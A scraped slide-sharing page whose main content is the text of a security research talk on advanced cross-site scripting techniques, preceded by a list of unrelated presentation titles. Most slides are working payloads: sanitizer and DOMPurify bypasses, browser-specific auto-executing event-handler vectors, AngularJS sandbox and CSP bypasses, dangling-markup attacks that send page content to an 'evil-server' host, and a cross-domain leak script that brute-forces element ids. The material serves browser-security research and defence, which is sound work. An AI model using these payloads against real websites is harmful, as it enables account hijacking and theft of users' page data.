Christine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptxChristine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptx
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
 
From Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMsFrom Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMs
 
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
 
Day 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio FundamentalsDay 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio Fundamentals
 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
 
High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
 
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
 
QA or the Highway - Component Testing: Bridging the gap between frontend appl...
QA or the Highway - Component Testing: Bridging the gap between frontend appl...QA or the Highway - Component Testing: Bridging the gap between frontend appl...
QA or the Highway - Component Testing: Bridging the gap between frontend appl...
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
 

XSS Magic tricks

  • 1. XSS magic tricks Advancements in XSS By Gareth Heyes @garethheyes
  • 2. • I ❤ hacking JavaScript
 
 
 
 
 
 
 
 • I'm a researcher at PortSwigger • Follow me on Twitter @garethheyes About me <a href=# name=x id=x>Click me on IE11</a> <script event="onclick(blah)<wtfbbq>{}" for=x> blah.view.alert(1) </script> <script event=onload for=window> return alert(2)};{ </script>
  • 4. • Consuming tags • title, noscript, style, script, noembed, textarea, plaintext, template, iframe, noframes
 
 
 
 • Template tag breaks out of select element <noframes> <img alt=" "> </noframes> <img alt=" "> </noframes> </noframes><script>alert(1)</script> Hacking filters <template><select><option></template><img src=1 onerror=alert(1)></select></template>
  • 5. • Title exists in SVG and HTML • Title consumes markup in HTML but not in SVG • HTML in SVG? Hacking filters
  • 8. • Edge bug causes title mutate • E.g. 
 in: <title>&lt;img&gt;
 out:<title><img> • I used this bug to bypass DOMPurify • in: <x/><title>&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;
 out: <title></title><img src="1"> • What about double HTML encoded? • in: <x/><title>&amp;lt;/title&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;
 out: <title></title><img src=1 onerror=alert(1)></title> Hacking filters
  • 9. • Invalid attributes
 <img ="/src/onerror=alert(1)//"> • HTML closing comments Firefox (version <=67)
 <!-- --!
 ><img src=1 onerror=alert(1)> --> • HTML opening comments Firefox (version 68.0.1)
 <!-[x00][x00][x00][x00][x00]- ><div title="--><img src=1 onerror=alert(1)>"></div> Hacking filters
  • 10. • Firefox allows NULLs in entities • <a href="javascript&[0x00]#x6a;avascript:alert(1)">
 test</a> • <a href="javascript&[0x00]colon[0x00];alert(1)">
 test</a> Hacking filters
  • 11. • Safari base tag • <base href="javascript:/a/-alert(1)///////"> • Turns every relative URL into XSS • <a href=../lol/safari.html>test</a> • <a href>haha</a> Hacking filters
  • 13. • Everyone knows about alert`1` • I found you could do: onerror=alert;throw 1 • throw accepts a JavaScript expression XSS without parenthesis and semi-colons
  • 14. • JavaScript expressions • x = (1,2);
 x//2 • Right hand side of expression is returned XSS without parenthesis and semi-colons
  • 15. throw onerror=alert,'some string', 123,'haha' • First part of the expression is executed sets the error handler • Last part of the expression is sent to exception handler XSS without parenthesis and semi-colons
  • 16. • How can you eval a string? • Prefixed with uncaught • Change it to an assignment
 
 throw onerror=eval,"=alertx281x29"
 //Uncaught = alert(1) XSS without parenthesis and semi-colons
  • 17. {onerror=eval}
 throw{lineNumber:1, columnNumber:1,
 fileName:1,
 message:'alertx281x29'} • Firefox prefixes exception message with:
 uncaught exception: 1 • How can we get round this? XSS without parenthesis and semi-colons
  • 19. • XSS in hidden input • Unexploitable when <> is filtered?
 <input type="hidden" value="XSS HERE"> • Access keys to the rescue! • "The accesskey global attribute provides a hint for generating a keyboard shortcut for the current element." mdn Hidden inputs
  • 20. • Firefox allows onclick event + access keys • <input type="hidden" accesskey="x" onclick="alert(1)">
 (ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) • Firefox only but the technique can be used on Chrome Hidden inputs
  • 22. • Access keys can be used on Chrome • Hidden inputs don't work • Other elements link, meta etc do
 <link rel="canonical" accesskey="X" onclick="alert(1)" />
 (ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) Link elements
  • 24. • Uses incomplete markup to extract parts of the page • <img src='//evil-server? • HTML parser finds an incomplete src attribute • Looks for ' to close the attribute Dangling markup
  • 25. • Example dangling markup attacks • <table><tfoot background="//evil-server? • <link rel=icon href="//evil-server? • <video><source src="//evil? Dangling markup
  • 26. • Chrome protects against dangling markup attacks • "Resource requests whose URLs contained both removed whitespace (`n`, `r`, `t`) characters and less-than characters (`<`) are blocked." https://www.chromestatus.com/feature/ 5735596811091968 • CSP will also block external requests if specified in the policy Dangling markup
  • 27. • Bypassing restrictive CSP & Chrome mitigations • CSP: default-src 'none'; base-uri 'none'; • <base target=" • Sets target for every link • The markup will get passed in the window name Dangling markup
  • 28. • <a href=//evil-server><font size=100 color=red>You must click me</font></a><base target=" • Anchor points to evil server • HTML styling is used to get round no inline styles • Target consumes all markup until the " is found • Clicking the link loads attackers server which reads window.name that contains the consumed markup Dangling markup
  • 29. • Mitigation <base target="_self" /> • Prevents target being overwritten • Bypass requires 2 clicks • <input name=x type=hidden form=x value="&lt;a href=//evil-server&gt;&lt;font size=100 color=red&gt;Click me second&lt;/ font&gt;&lt;/a&gt;"><button form=x><font size=100 color=red>Click me first</font></ button><form id=x target=" Dangling markup
  • 31. • Firefox onloadstart
 <img src=1 onloadstart=alert(1)> • Firefox onloadend
 <img src=1 onloadend=alert(1)> • <video><track default onload=alert(1) src="data:text/ vtt,WEBVTT"></video> Auto executing vectors
  • 32. • Chrome
 <svg><discard onbegin=alert(1)> • Safari
 <svg><anything onload=alert(1)> • General svg 
 <svg><animate onbegin=alert(1) attributename=x dur=1s>
 <svg><set onend=alert(1) attributename=x dur=1s>
 <svg><animatetransform onrepeat=alert(1) attributename=x dur=1s repeatcount=2> Auto executing vectors
  • 33. • <body onpageshow=alert(1)> • <body onpopstate=alert(1)>
 <iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x-domain.com/#';flag=1}"> • <body onhashchange="alert(1)">
 <iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x- domain.com#';window.flag=1;}"> • <body onmessage=alert(1)>
 <script>
 postMessage('test','*')
 </script> Auto executing vectors
  • 34. • <body onbeforeunload="location='javascript:alert(1)'">
 <iframe src=//x-domain.com onload="if(!window.flag) {this.contentWindow.location='//x- domain.com#';flag=1}"> • <body onresize="alert(1)">
 <iframe src=//x-domain.com onload="this.style.width='1000px'"> • <body onscroll=alert(1)><div style=height:1000px></ div><div id=x></div> Auto executing vectors
  • 35. • <style>
 @keyframes x{
 }
 </style>
 <b style="animation-name:x" onanimationstart="alert(1)"></b>
 <b style="-webkit-animation-name:x" onanimationstart="alert(1)"></b> • Discovered by the legend Mario Heiderich • Executes on every tag but requires an injected style Auto executing vectors
  • 36. • ontransitionend works on Chrome • <style>
 :target {
 color:red;
 }
 </style>
 <x id=x style="transition:color 1s" ontransitionend=alert(1)> • URL: page.html#x Auto executing vectors
  • 37. • ontransitionrun works on Firefox • <style>
 :target {
 color:red;
 }
 </style>
 <x id=y style="transition:color 2s" ontransitionrun=alert(1)> • URL: page.html • URL: page.html#x Auto executing vectors
  • 38. • Firefox ontransitioncancel • <style>
 :target {
 color: red;
 }
 </style>
 <x id=x style="transition:color 10s" ontransitioncancel=alert(1)> • URL: page.html# • URL: page.html#x • URL: page.html# Auto executing vectors
  • 39. • Remember the classic vector?
 <input autofocus onfocus=alert(1)> • Autofocus required? • Nope 😀 <input onfocus=alert(1) id=x> • URL: page.html#x Auto executing vectors
  • 40. • onblur becomes auto executable (Every browser except Firefox) • <input onblur=alert(1) id=x><input autofocus>
 <textarea onblur=alert(1) id=x></textarea><input autofocus>
 <button onblur=alert(1) id=x></button><input autofocus>
 <select onblur=alert(1) id=x></select><input autofocus> • URL: page.html#x • Focus events fire for iframes too • <body onblur=alert(1)><iframe id=x></iframe>
 <iframe id=x onblur=alert(1)></iframe><input autofocus> Auto executing vectors
  • 41. • <embed id=x onfocus=alert(1) type=text/html> • <object id=x onfocus=alert(1) type=text/html> • <video id=x controls onfocus=alert(1)>
 <source src="validvideo.mp4" type=video/mp4>
 </video> • <audio id=x controls onfocus=alert(1) id=x>
 <source src="validaudio.wav">
 </audio> Auto executing vectors
  • 43. • Standard AngularJS sandbox escape:
 {{constructor.constructor('alert(1)')()}} • Can we make it shorter? • {{$eval.constructor('alert(1)')()}} • Shorter still?
 {{$on.constructor('alert(1)')()}}
 //Credits Lewis Ardern AngularJS
  • 44. • What if you can't call $eval? e.g. in a orderBy filter • Can't use strings • {{toString().constructor.prototype.charAt=[].join; [1,2]| orderBy:toString().constructor.fromCharCode(120,61,9 7,108,101,114,116,40,49,41)}} AngularJS
  • 45. • CSP bypass for all versions of AngularJS • 63 characters! • <input id=x ng-focus=$event.path| orderBy:'CSS&&[1].map(alert)'> • page.html#x • Cross browser:
 <input id=x ng-focus=$event.composedPath()| orderBy:'CSS&&[1].map(alert)'> AngularJS
  • 47. • Focus event fires for iframe, input etc • Can we detect if this happens cross domain? • If it can be detected then id's can be bruteforced x-domain XS-Leak
  • 48. • onblur event will be fired when cross domain element is focused • Hash can be checked multiple times with only 1 http request • Requires a frame-able page XS-Leak
  • 49. XS-Leak Cross domain input element Same origin onblur event Same origin, shows current position <input id=1337> <body onblur="if(!window.found){window.found=true;alert('Found: '+pos)}"> <div id=y></div>
  • 50. pos = 1000;found = false; var iframe = document.createElement('iframe');iframe.src='//x-domain.com'; document.body.appendChild(iframe);iframe.onload = next; function next() { if(!found){ document.getElementById('y').textContent = pos; iframe.src='//x-domain.com#'+pos; timer = setTimeout(function(){ if(!found && pos < 2000) { pos++; } next(); },50); } } //http://portswigger-labs.net/x-domain_leak_focus_095FD68DF/ XS-Leak
  • 51. Auto execute on every tag?
  • 52. • "The tabindex global attribute indicates if its element can be focused, and if/where it participates in sequential keyboard navigation" mdn • <a onfocus=alert(1) id=x tabindex=1> • <div onfocus=alert(1) id=x tabindex=1> • <xss onfocus=alert(1) id=x tabindex=1> • page.html#x Auto execute on every tag?
  • 53. • Works on pretty much every tag • Link works but requires display block • <link onfocus=alert(1) id=x tabindex=1 style=display:block> • Link works in the body but not head Auto execute on every tag?
  • 54. • <a onfocusin=alert(1) id=x tabindex=1> • <div onfocusin=alert(1) id=x tabindex=1> • <xss onfocusin=alert(1) id=x tabindex=1> • <xss onfocusout=alert(1) id=x tabindex=1><input autofocus> • page.html#x Auto execute on every tag?
  • 55. • IE activate/beforeactivate event • <a onactivate=alert(1) id=x tabindex=1> • <div onactivate=alert(1) id=x tabindex=1> • <xss onactivate=alert(1) id=x tabindex=1> • <xss onbeforeactivate=alert(1) id=x tabindex=1> • page.html#x Auto execute on every tag?
  • 56. • IE deactivate/beforedeactivate event • <a ondeactivate=alert(1) id=x tabindex=1></ a><input id=y autofocus> • <xss ondeactivate=alert(1) id=x tabindex=1></ xss><input id=y autofocus> • <xss onbeforedeactivate=alert(1) id=x tabindex=1></ a><input id=y autofocus> • page.html#x • page.html#y Auto execute on every tag?
  • 57.
  • 58.
  • 59. Questions? thanks and shout outs to @garethheyes James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski <img src=1 onerror="alert('Wait. What. IE/Edge')};while(true)sendMeToTheJSBlackHole();function lol(){">